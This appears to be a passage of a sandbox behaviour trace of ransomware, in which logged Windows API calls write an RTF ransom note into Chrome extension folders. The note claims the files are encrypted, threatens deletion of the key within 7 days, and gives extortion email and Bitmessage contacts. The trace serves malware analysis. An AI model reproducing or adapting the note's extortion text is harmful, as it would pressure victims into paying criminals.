t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.639] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.640] CloseHandle (hObject=0x2c8) returned 1 [0281.640] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\#readme_eman#.rtf")) returned 0xffffffff [0281.640] GetLastError () returned 0x2 [0281.640] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_TW\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\zh_tw\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.649] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.649] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 